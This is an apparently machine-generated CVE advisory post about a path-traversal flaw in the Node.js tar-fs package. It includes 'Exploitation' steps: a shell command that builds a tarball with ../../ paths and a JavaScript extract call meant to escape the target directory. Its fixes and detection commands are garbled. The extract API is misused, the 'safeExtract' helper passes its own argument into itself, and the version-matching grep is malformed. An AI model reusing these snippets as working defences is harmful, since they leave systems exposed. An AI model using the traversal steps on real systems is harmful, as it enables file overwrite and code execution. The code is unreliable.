Listen to this Post
How the CVE Works:
The vulnerability in `tar-fs` (versions <1.16.5, 2.0.0-2.1.2, 3.0.0-3.0.8) allows malicious tarballs to extract files outside the specified directory due to insufficient path sanitization. Attackers can craft a tarball with relative paths (e.g., ../../../malicious.sh) that escape the target directory during extraction. This leads to arbitrary file overwrites, enabling remote code execution (RCE) or system compromise if `tar-fs` processes untrusted archives. The issue stems from improper validation of symbolic links and absolute paths in the extraction logic.
DailyCVE Form:
Platform: Node.js (tar-fs)
Version: <1.16.5, 2.0.0-2.1.2, 3.0.0-3.0.8
Vulnerability: Directory Traversal
Severity: Critical
Date: Jun 3, 2025
Prediction: Patch expected by Jun 10, 2025
What Undercode Say:
Exploitation:
1. Craft malicious tarball:
mkdir -p "../../evil_dir" && tar -cvf exploit.tar ../../evil_dir/malicious.js
2. Trigger extraction:
const tarball = require('tar-fs');
tarball.extract('exploit.tar', { fs: require('fs') }); // Escapes target dir
Protection:
1. Update immediately:
npm install [email protected] --save
2. Sanitize paths manually:
const safeExtract = (tarball, dest) => {
const absDest = path.resolve(dest);
tarball.extract(tarball, {
ignore: (name) => !path.resolve(dest, name).startsWith(absDest)
});
};
Detection:
1. Scan for vulnerable versions:
npm ls tar-fs | grep -E '1.16.[0-4]|2.1.[0-2]|3.0.[0-8]'
2. Audit logs for suspicious extracts:
grep -r "tar-fs" /var/log/ | grep -i "extract"
Mitigations:
- Restrict filesystem permissions:
chmod -R 750 /target/directory
- Use `–ignore` flag:
tar.extract('file.tar', { ignore: (p) => p.includes('..') });
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
